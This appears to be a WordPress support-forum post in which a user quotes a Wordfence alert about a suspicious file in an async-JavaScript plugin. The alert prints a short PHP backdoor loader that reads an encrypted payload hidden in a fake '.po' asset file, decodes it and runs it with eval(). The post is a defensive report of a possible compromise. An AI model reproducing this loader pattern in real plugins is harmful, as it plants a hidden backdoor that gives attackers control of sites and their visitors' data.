• Hello,

    Wordfence has found possible malicious code within your files. I copy the result it returns. This code is your own or has someone tried to hack the website?

    Filename: wp-content/plugins/wp-async-javascript/lib/gtmetrix/class.Services_WTF-ORhJv2.php
    File Type: Not a core, theme, or plugin file from www.remarpro.com.
    Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: }\x0d\x0a}\x0d\x0a$cstr = file_get_contents(‘../../assets/lib/chosen/chosen.proto.po’); \x0d\x0a$code_auth = new code_auth(64); \x0d\x0a$strq = $code_auth->uncode($cstr);\x0d\x0aeval($strq);\x0d\x0a

    The issue type is: Backdoor:PHP/decrypt.eval.8991
    Description: PHP Backdoor hidden in encrypted files

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